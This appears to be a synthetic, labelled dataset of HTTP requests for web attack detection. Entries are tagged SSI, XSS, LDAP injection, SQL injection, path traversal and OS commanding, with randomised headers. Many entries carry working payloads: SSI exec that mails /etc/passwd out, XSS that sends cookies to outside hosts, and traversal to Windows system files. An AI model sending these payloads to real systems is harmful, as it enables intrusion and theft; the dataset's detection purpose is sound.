ETag: W/"wryss1qTRZpPdP9"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Sun, 27 Sep 09 16:18:48 GMT
If-Unmodified-Since: Mon, 30 Oct 06 23:51:08 CET
If-Match: *
If-None-Match: "iIRmCLKqu4.t8i5"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.7
Pragma: r9bSoi='r'
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Digest opaque="Onooem"
Range: 306-7480,026547-8
Referer: http://dgR2ocdr.com/lenbasd/Aelnui/ye8uSe.jpg
TE: trailers
Trailer: Referer
User-Agent: snntldaaHond2
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: FTP/8.4 116.93.217.116
Transfer-Encoding: identity
Upgrade: 2srsc/7.4
Warning: 942 43.44.236.191:46 "btf9mwO" "Mon, 04 Sep 06 14:47:25 CET"
X-Forwarded-For: 15.44.55.26
X-Serial-Number: 4915309492060646563
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37263
Start - Id: 37762
class: LdapInjection
GET /Z4WTHo/hQp16v1R0g6LvBIx/nZThDEsGjs6nor/cOosenrwtawtmsss/atderrtdeEa3edaeTn/eJCXX4e8hTbHjBp8SWP/gED/tguiyn9taoazsyc2akek.cgi?efgehtnmltno=013500&sa=awfu1%2Bibaro+&4ze7scglata9=Dwew&tRyc6idnE=74550561&CQJUVGG=ylrthen3ogr&eeeIpiis8y9Cegw=E5n+Dyh&oinzohbonazill=23047784&toHubaenEL9=lt1%3Coc&oqisNu38snBw=k+rnmocha+errMsfiihomefrom2&srrn=%29+%28%7C%28displayName%3Dhad*%29+%28name+++%3Dhad*%29%28++++mail%3Dhad*++%29 HTTP/1.1
Host: www.hE1ehliwe.de
Connection: 5uso
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: Te-lxb, oe3h-r;q=0.0
Cache-Control: min-fresh=852
Client-ip: 28.9.182.133
Cookie: dtn=17182;tr9r5pa4rbr=&Cd;hwDs=wt;ysl=hechildh;tiis69=dP5DIOxUV;48Lsysteminsert7Vqa=ofnust
Cookie2: $Version="43"
Date: Mon, 23 Oct 06 19:49:16 GMT
ETag: "YqtkkSC8VmbrWnG"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Tue, 22 Sep 09 15:17:25 CET
If-Unmodified-Since: Sat, 04 Sep 04 03:55:11 CET
If-Match: *
If-None-Match: "FlUyRH.svcx1-1Rbz"
If-Range: *
Max-Forwards: 2657
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Basic TmllbGFlbmM6SXdsa2Fjcw==
Range: 059-52057,02-0322
Referer: http://nuho9.net/zUsa/tesq/ntistr/acn3aw/htesfaPg.css
TE: trailers,deflate
Trailer: From
User-Agent: oaeoetoEroeI4tr
UA-CPU: x86
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 9.3 236.180.150.129
Transfer-Encoding: 5naO; rsx93jn=gmndN
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 119.201.197.51
X-Serial-Number: 7486160267274211008
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37762
Start - Id: 40276
class: SSI
GET /G2@child/BsiitzpassthruyJsLgJJ/trFh_.nmUrYWx7lDJ./eneWfDBwXA_MFKt/-VEQQC0/nr1lSt5jdkI9gZCnb/hr0rnoe/nYjt4Sy1N4Qmqu.png?iwxhmztiopi=mQdK&ejttdypiawe=8&btesmnlszn=27634661&n2opgewer=%3C%21--%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cd8bi%5Cisi5eya%5Cncn.exe+++d%3A%5Cmntojei%5Cwww.trintiri.org%5ClS%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E&Ct3iaeeen=%5C+%3B&hHiitrsmtjtertt=1067089&afsh=lvda&9drjq511e=eaEezu&fpuns=008&sneSyraOVaem=Auirnhp&nuamsc=YedIilv5ch5erLn7t HTTP/1.0
Host: www.yarfinrcuz.it
Connection: pJnrEqt
Accept: */*;q=0.9
Accept-Charset: cp-936, iso-2022-jp, x-mac-roman, macintosh;q=0.1
Accept-Encoding: identity, deflate;q=0.2
Accept-Language: oe-a;q=0.6, 6-bTZieh6h, W5us-ahL;q=0.3, hlNTp-orh2wle;q=0.0, rThtpr-2cs;q=0.5
Cache-Control: min-fresh=109
Client-ip: 230.236.181.10
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="114"
Date: Sat, 26 Dec 09 20:42:54 CET
ETag: W/"PvC@pDiEamK-qycb0"
Expect: eAae
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sat, 22 Oct 05 03:31:29 GMT
If-Match: *
If-None-Match: "zUs4n7y9dmzljtr"
If-Range: *
Max-Forwards: 18
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=4FCdffE7
Range: 1030-
Referer: http://ersne.it/F1nniaar/tp64tnJe/frrI.msf
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/2.8 (X11; U; Linux i586 5.3; dr-h9; rv:2.4.5) Gecko/10712257
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 1.5 www.iectU.jpg
Transfer-Encoding: gzip
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40276
Start - Id: 39863
class: SSI
GET /hG-Vqpq.oWsqL93p4IA/4EJtopSf_mkrC_5u2RYu/fFYCP/gd_m@ebB-VuVu/ARaewo6rrV/ecwbt/4D8WT/rk5XDHLq9/a2yV@lKla46/uoaetg6.php4?sqsejfesdshhe=psn&ico0eiseeblslrg=iNuq5A&i2dn61epd2it=%27havingtw&robcnEtae=shyoj3p&ainbs=i+deleteir&glamc9j=srstylejC+%3C%27pt&wrAstq=46706516&oe=tme&Iawug2=9571&caFc=rp.lROByzKI7&en=w0%7Epdest&ry8a7i=aoaj6tiv8Ittxe HTTP/1.1
Host: 58.164.203.138
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=01206
Client-ip: 72.149.162.72
Cookie: mU6bF0w=tsiSk;;dqizhhcsl=ikIH.Ugv
Cookie2: $Version="32"
Date: Mon, 16 May 05 08:37:32 GMT
ETag: W/"oHd1XzeKjS8PLw.3w"
If-Modified-Since: Mon, 13 Jul 09 04:57:52 UTC
If-Unmodified-Since: Wed, 20 Aug 08 07:34:52 UTC
If-Match: "895t6yWpSMcNM_u_"
If-None-Match: *
Max-Forwards: 8
Authorization: Basic M2VnbXRyWGU6ZXlyZw==
Referer: /nesrlo.dll
Trailer: If-Match
User-Agent: <!--     #exec     cmd="/bin/mail    mbexer5.com <    /etc/passwd"-->
UA-OS: Win98
Via: FTP/8.2 102.13.66.41, 6.2 www.lfnye.gif, 1.3 198.81.125.97
Warning: 209 www.daamss.tiff "yniaeoswcau3uo" "Mon, 26 Jun 06 17:21:53 CET"
X-Forwarded-For: 250.219.51.61
----: ---------------------------------

null

End - Id: 39863
Start - Id: 39165
class: SSI
GET /hsAb6aeIb/41icHli.js?oM8sY7yy7te=7eueet&z6BX2L=324&anla=awla%2B+%24ibSyaiou%7CPets&nanc=hr8iuit&enorges1bv2=6553016&et=andedmaaom&0nhee=se0oa HTTP/1.1
Host: 101.154.54.234
Connection: Hozhgc6
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.9
Cache-Control: min-fresh=1506
Cookie: otTlmdn4nrhs8Nh=ae;er3E=<!--     #exec cgi="/cgi-bin/script?neo"    -->;wnylef=buaSYxw4dnif p
Date: Fri, 26 Sep 08 05:14:01 GMT
ETag: W/"g4_RKQ930cNQIk930"
If-Modified-Since: Mon, 05 Jul 04 21:29:29 GMT
If-None-Match: *
Max-Forwards: 10
Pragma: no-cache
Referer: /8srpe/bGhjoh6/anw3/9fwter.mdb
User-Agent: Mozilla/4.1 (compatible; e9on; Open BSD i386; sTvdl; ctibho3a; Oipn8y)
UA-Disp: 559,4539,16
Transfer-Encoding: compress
Upgrade: vcc/0.9, tts/4.8, iyet/4.4, 1E1rE/1.4
----: -----------------

null

End - Id: 39165
Start - Id: 47925
class: XSS
GET /aoui/eblpteso/AZsHCWUU3img@Ls/huZuPVtqxxaYCjmrB.Wj/bfah3qnttrmagnaoaD3/agEICqB7H/uT6cX2_Ixk2gmQbESlsf/TcZ3TBfjrm3tK/m3m1g/aoOw6gV./edsm4emaepeEo.php?dqi=csdGtnvlWerFwnuiA&ks=%3Cdiv++++style++++%3D+%22+++++background-image%3A++url%28javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F160.135.31.172%2Folalto.msf%27%2Bdocument.cookie%29%3B%5D%29%3B+%22++%3E&ehtezeEenln=aaqr&ashomiEnCTc=atredleeI%5C&Sbgsound2replace@jnhtpass=einEg&bRt.E.KhZ=hnftvuuani&hdoHobafitb=146 HTTP/1.1
Host: www.ttiTa.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: thhss='kdoA'
Client-ip: 153.57.45.73
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="61"
Date: Mon, 18 Sep 06 20:17:25 GMT
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: dtlie@titeAadsjb.com
If-Modified-Since: Fri, 21 Nov 08 07:20:30 CET
If-Unmodified-Since: Tue, 12 Oct 04 04:51:46 CET
If-Match: "T788q.df5_DcV@5k"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 4800
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: -6
Referer: /4vMsetps.jpg
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: ty23M2T http://www.c1mry.org
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 1.0 0.151.201.249, 2HC3/5.8 www.eohu.png, 7.6 www.zlmqtoS.jpg
Transfer-Encoding: identity
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47925
Start - Id: 45745
class: PathTransversal
GET /PEwCzqPcmd8/fLvcoPL.sTQ8FN61/z0/toFdZ@RM8uYincsXqk@/yp.qTeGBV_xDm/fbinU5ZXu.muHperlNgR/aHgsii3VCv0Nn/eeipe/wciteh/emeyoxnow/c00wi2.bin?XfbCCopen7ged-G=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 42.129.10.95:78254
Connection: close
Accept: video/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.173.15.184
Cookie: swioeoneter=ntaoEms;ir0=ns3Ru:nthH;bnuest2ceemfta=uesnektle9;gO=1
Cookie2: $Version="34"
Date: Wed, 14 Sep 05 02:36:30 GMT
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Fri, 14 Apr 06 23:37:42 GMT
If-Unmodified-Since: Fri, 24 Feb 06 17:54:29 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: *
If-Range: Mon, 26 Apr 10 04:08:55 GMT
Max-Forwards: 9
MIME-Version: 7.5
Pragma: ln=ddnmf
Proxy-Authorization: wptoa ypehsb8=2pbhrh0a
Authorization: NTLM dHJudWdOZGlIbGNwaW5ic0RlaGRobmtzbnhkbG9pcmMxb21laWlUZWxodGt0
Range: -500252,934-3694
Referer: /emisngu.msf
TE: gzip;q=0.5,deflate;q=0.0
Trailer: If-None-Match
User-Agent: rr3rlect1gpdosAcDjbA
UA-CPU: StrongARM
UA-Disp: 857,9734,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/1.9 www.Ossa.png
Transfer-Encoding: iRed; ea0um=pycehsj
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 665 www.fiYe23m4.htm:79508 "hman" "Fri, 20 Oct 06 22:19:29 UTC"
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45745
Start - Id: 46943
class: XSS
PUT /ehllNaeFeseaosahh.mspx? HTTP/1.1
Content-Length: 391
Content-Language: ep
Content-Encoding: deflate
Content-Location: /1cRNnvts/x5pshd/eeoli/eterixn.tar.gz
Content-MD5: bTJhdG1oTGFnYWh0dGUydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Thu, 15 Jun 06 20:48:30 GMT
Host: 70.107.239.137:3094
Connection: close
Accept: audio/x-wav;q=0.2, video/*, image/jpeg;q=0.9
Accept-Charset: utf-7, gb2312;q=0.9, windows-874;q=0.2
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.249.16.142
Cookie: yrpgos7=6612183;replace7cdJE=eGbX317rO0
Cookie2: $Version="22"
Date: Fri, 16 Dec 05 21:01:09 CET
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
If-Modified-Since: Mon, 27 Jul 09 08:32:19 GMT
If-Unmodified-Since: Tue, 25 Jan 05 14:17:47 UTC
If-Match: "RyE260VFVQOsLC1@LfU5"
If-Range: Sun, 03 Dec 06 16:27:16 GMT
Max-Forwards: 0
MIME-Version: 0.6
Pragma: no-cache
Authorization: Basic cmlycnU6b2NuaWl0
Range: 16111-
Referer: /dunsF.jsp
TE: gzip;q=0.1,trailers,trailers
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 5.1; iy-ts; rv:3.1.4) Gecko/90904197
Via: HTTP/3.7 www.eaftusE.css:17, HTTP/0.9 www.59sByr.jpg, 6.8 143.145.105.237
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hpn4a4efE=117&lsW5K3AJ=tneune<oIweTs6&leht=6416&ozyoeoad9a9oae=342&reoee=<img src  =    "   lendries >     " onmouseover=  "     [document.location.replace('http://www.liorattr.com/cgi-bin/anilsestle.cgi'+document.cookie);]   "   >&qaa=c.4FPByo&XuB8pn=wlqB&ashcngnaaz=nibody&iolftsmnhhne=ese&ecDewI3bevaenn=sli$ aai&tmEplsEi4=tcolere6ee8giijah

End - Id: 46943
Start - Id: 37740
class: LdapInjection
GET /0ifbn/nnespo.nsf?hxYcotu2I=oIz%5Dsdsa40d&moanns=31394&C_Z5yPJ-oJ2=ewoU5%40__.&heHf5=48452754&sr=7621865&Dnirm=4tarI&KscriptBt=%29+%28%7C++++%28+++cn%3D*o+%27brien*+%29%28mail++%3D*o++++%27brien*+%29++++&siciapqaalW=n%3B6s2tformevale HTTP/1.1
Host: 43.48.185.32:009
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 176.160.67.197
Cookie: ioirui=0t
Cookie2: $Version="7"
Date: Tue, 07 Nov 06 12:34:04 GMT
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Thu, 17 Jul 08 20:34:34 UTC
If-Unmodified-Since: Mon, 17 Dec 07 24:28:05 UTC
If-Match: "TB38GRc90FRtspy"
If-None-Match: *
If-Range: Wed, 16 Jul 08 03:08:23 GMT
Max-Forwards: 16
Pragma: no-cache
Authorization: Digest uri=http://www.iocewM.gov/Rinu4/dgoSehz/iei6hap/ndwygij.mspx
Range: 79793-4
Referer: http://www.eob7gtn.org/xneee5/9tnrMvte.txt
Trailer: Date
User-Agent: Mozilla/9.0 (compatible; iynXfSnvp; WinNT; icp4ouitL; yttsaqyNT)
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Solaris
UA-Color: color32
Via: HTTP/8.8 192.182.30.115
Transfer-Encoding: gzip
Upgrade: ttg/0.7, pnio/2.7
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37740
Start - Id: 43933
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 62.28.221.119
Connection: close
Accept: application/*;q=0.8, image/png;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, compress;q=0.8, identity;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.178.200.227
Cookie: e7aisVn=2+likes;i7uenEDwtton=Aa;sanitoamo88fsa=iHN@vJ0D;djaduoilsh=itdc;Pdrop7cQIE_4=2129515;dsnMt=4722494930
Cookie2: $Version="99"
Date: Sun, 14 Sep 08 23:33:12 UTC
ETag: W/"wdQ2Ht9LzrcmrGUT5"
Expect: Hqscnnpi
From: lwml7nN@otm7kisnc.cz
If-Modified-Since: Wed, 02 Jul 08 01:27:41 UTC
If-Unmodified-Since: Mon, 12 Apr 10 12:24:17 GMT
If-Match: "@ttS3Ol8Y1fYbYq0ON"
If-None-Match: *
If-Range: Tue, 27 May 08 20:22:42 GMT
Max-Forwards: 171
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: http://DlwaeeMo.st/oilftao/eort/fnc0ln/vutlsb.js
TE: trailers,deflate;q=0.9
Trailer: If-None-Match
User-Agent: olsmieanxi/8.8.2
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: FTP/6.7 144.226.18.215:947, 2.8 254.130.96.148, 6.3 68.28.248.207:6
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43933
Start - Id: 45293
class: PathTransversal
GET /lK_./eaahrrqp/aAla5rtB2asr/nRQVo_/@BAZtsGJPZ/vWdq2GXQJGcm6uUa2/tllne.mspx?Bwolle4Eho7nfe=e2c&htcjarieeeb80l=817514971&enptleCt86yTi=086&sa=-%3B9%3F&Tet6o=xbgheasrye&Se=snwsnilth&6Nrd7=eh%3F&ysune=7&3jtfs1il=8 HTTP/1.1
Host: 113.181.136.141:8445
Connection: uettpjn
Accept: audio/x-wav;q=0.0
Accept-Charset: iso-8859-7
Accept-Encoding: compress
Accept-Language: ..\..\..\..\..\..\WINDOWS\system.ini
Cache-Control: no-transform
Date: Wed, 11 Jun 08 04:33:51 GMT
ETag: "RUC6_eMpGbZsMGv2eAP"
Expect: eeun
If-Modified-Since: Sat, 25 Sep 04 16:55:16 UTC
If-Unmodified-Since: Sat, 09 May 09 10:45:35 GMT
If-Match: "axR.BfuF0jvJxJCZJ"
If-None-Match: "vy26I@I4OMlfY.MxNNn"
If-Range: Tue, 27 Mar 07 21:23:04 UTC
Max-Forwards: 65
Pragma: hiuie='iaih'
Proxy-Authorization: dnhat tciorE=dIorDai
Authorization: Basic NnZlbjpzb2FiaGhl
Referer: /ntce4.tar.gz
TE: gzip,chunked;q=0.0
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 9.9; ie-mH; rv:8.4.0) Gecko/75382378
UA-OS: Win95
Via: 1.5 155.33.83.77, 5.8 58.181.76.38:8
Transfer-Encoding: xbNio; pethrsp=higu5
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45293
Start - Id: 35117
class: SqlInjection
GET /NXvIBselectj./3f/laJBUL-/hDuVMMeBjkh8@yJjI/16/t4/FQ7WqSVE8U11P/nemiOonreojXnkqljeld/w9/8eNhRtkY/hoItamvwEFr5k/0D-B.html?eMhsatazdai=4&eedneheiiss=str&5coaa=btav%2F0aoJ&etrumhraeJmbeg=a&6qLI3jXfE7LN=b0ae6upU%24%5Bkah&tNabna=d HTTP/1.0
Host: 112.167.173.194
Connection: keep-alive
Accept: image/jpeg;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lymO-liol1, ictas-eem;q=0.6, yw9rh0uu-o67tp, ahldees-an;q=0.4, lwbtt-nht2cb8h
Cache-Control: no-store
Cookie: na2soasalodgyp=elU;ewrsnxe='; shutdown--
Cookie2: $Version="688"
Date: Mon, 13 Dec 04 04:32:56 GMT
If-Modified-Since: Wed, 29 Dec 04 10:44:54 CET
If-Unmodified-Since: Mon, 17 May 04 17:29:46 UTC
If-None-Match: *
Authorization: nrbirr tord=mangnoyj
Referer: http://mhd5l.org/DPfeo/o6yg3er/adwads/ee4kJoee.bin
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 3.2; nc-he; rv:3.3.3) Gecko/53759176
UA-OS: Win9x
UA-Color: color32
Via: 7.1 www.io1kn.jpeg
Transfer-Encoding: deflate
Warning: 292 www.vwRfe.html "icdsciHs6R" 

null

End - Id: 35117
Start - Id: 37784
class: LdapInjection
GET /j9oFbKo-d/cizInhnblitnrI2e/8Jf/dI37nCV849@@oU0M-qO/okzEpt/x-processing-instructioniSleNc/kxomsiaI9lergmeTie/ndofeedv/0w.shtml?ruidulr3r27sk=%29+++%28+%7C++++%28++++cn%3D*o+%27brien*%29%28mail++++%3D*o+++%27brien*++++%29+&ltrs0ewsox=70043 HTTP/1.0
Host: 62.159.15.250
Connection: close
Accept: audio/*, application/*
Accept-Charset: euc-jp;q=0.8, iso-8859-2, koi8;q=0.2, iso-10646-ucs-2;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 194.12.134.57
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="8"
Date: Tue, 11 May 04 02:55:18 CET
ETag: W/"wqXeYj8wafpRO-nkERn"
Expect: wdlwmtn=rmtd;isou5=aemieea
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Sun, 01 Oct 06 09:49:08 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: "h4vqtjtPT2lqiJD.pcQ_"
If-None-Match: *
If-Range: "wuvfO.hD2i8yboWEKoWK"
Max-Forwards: 3152
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: RanlI8 hfn2me8l=cnlo
Authorization: Basic ZGhhaXNpZW06cnlyYQ==
Range: 479-,836-,84-
Referer: http://www.ufphbh.it/ueay/yabtr.asp
TE: gzip,trailers
Trailer: Range
User-Agent: lstq5e
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: FTP/3.0 145.232.90.120:7617, 8lo/7.5 171.43.237.71
Transfer-Encoding: deflate
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 319 211.214.89.238 "adgomoeic1o7Sowrtnl" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37784
Start - Id: 45062
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.sfweht.com
Connection: keep-alive
Accept: audio/x-wav, text/*;q=0.4, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 4.109.212.12
Cookie: owoh9eebHLot=sock_streamE;EgFO9Kh1=eorAhdyn;bin_yon-t=dma00jhtva;nhegaoeh=123823892
Cookie2: $Version="628"
Date: Mon, 25 Jul 05 07:20:51 CET
ETag: W/"VI05iHgMeDWsSIG"
Expect: lldiV
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Mon, 07 Jan 08 24:25:13 CET
If-Unmodified-Since: Thu, 23 Sep 04 06:17:32 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 7143
Pragma: no-cache
Proxy-Authorization: NTLM bHRoZXRvdG1yMmw5cm1lbnlvNDVsNWFhM3NkZHVveWlp
Authorization: NTLM dDZmdGh3cmVoZXJ3eDV0ZWh0dGR4cm90dGVnRXJpZ2QzaW9idGx1ZU84aTZycnJ0
Range: 373-850
Referer: http://www.xc1nstrr.uk/fu6toptg/s6isCec.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.0 (compatible; Konqueror/6.8; Unix; tW5nbmb; naandti4n; arT5)
UA-CPU: 68000
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45062
Start - Id: 39529
class: SSI
GET /oaHb/1utohVmazkrysshsho5/sD/gSC_uLb3rPFPI/dzartplyyvabx/rieue/iuusniaocaotean2ziEt/dMGQ9S2nDYOrvHV3LYbt.pl?ucoaaia=valog+drop HTTP/1.1
Host: 218.177.128.202
Connection: close
Accept: application/*;q=0.3, image/jpeg;q=0.5
Accept-Charset: koi8;q=0.1, windows-1257;q=0.8, iso-8859-5, windows-1252;q=0.0
Accept-Encoding: gzip, deflate, gzip;q=0.0, compress;q=0.2
Accept-Language: auos-pkggi;q=0.3, Edtq-xansno, wkl-4d, xp2-1eha7, Rixdm-9;q=0.7
Cookie: tmp0RB0Ij=hYnh;5e50fh9eaTrt2bt=es;g6xoteehla=<!--   #include   virtual="/etc/passwd"  -->
Cookie2: $Version="8"
Date: Wed, 19 Jan 05 19:42:32 GMT
If-Unmodified-Since: Thu, 03 Jan 08 01:22:24 CET
If-Match: "@iB2z4sfLEfgGsit"
Pragma: no-cache
Referer: /anhe/flevth/ctnNes1o/ntrg/rWeomyo.asmx
User-Agent: ggx6NZ0XQl http://www.DotUocoe.de
Transfer-Encoding: deflate

null

End - Id: 39529
Start - Id: 40944
class: SSI
GET /uO2ado/jwVzZxterm6RbB/lUMj/aj4gXWf/CrOQ3CWqpR%uzAbinz/stsmaiIna/iqdGohU5yTq/FN%u/VmvW64i6B7/tSndoseuaeeIjtyaams.js?EwatedaaY=ffl&lpitd6lev=%3Bulocationstyleoenlrhqee+g&Ou5fsfNt=%3C%21--+++%23odbc++connect%3D%22Zl%2CoWtp%2Cdo6ef%22+++++++++statement%3D%22select+++*++from+++s%22--%3E HTTP/1.1
Host: 229.126.80.21
Connection: fema7j
Accept: application/rtf;q=0.6, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, compress
Accept-Language: *;q=0.6
Cache-Control: c9tA='uslV'
Client-ip: 138.126.169.97
Cookie: trp3eo1fmlvb3=oppeteboot.inibintely%SpasswdOue;f61brhielnOwS=%=divt;aieNels9sto=t;sehsmyt4=vraxhavingioN 7hml nhttpsallpositiono
Cookie2: $Version="04"
Date: Wed, 17 Mar 04 07:19:20 CET
ETag: "N8O@241VAkaJCDw"
From: sea3iyve@s4mn47e.uk
If-Modified-Since: Tue, 16 Aug 05 08:58:56 UTC
If-Unmodified-Since: Wed, 26 Dec 07 03:13:48 CET
If-Match: "CXoL5WdS9.u_jzQyj3q8"
If-None-Match: "O9g9H39mjsVeEv3uPV"
If-Range: *
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: NTLM cmJLZXZDSWlzd2VyY3R6dDJyVHNmbmRtcmdheXN0ZWJ2bzdpc1RuaGlzYw==
Authorization: Basic cGNnZTprc3Nmb2Uw
Range: 3754-,869645-
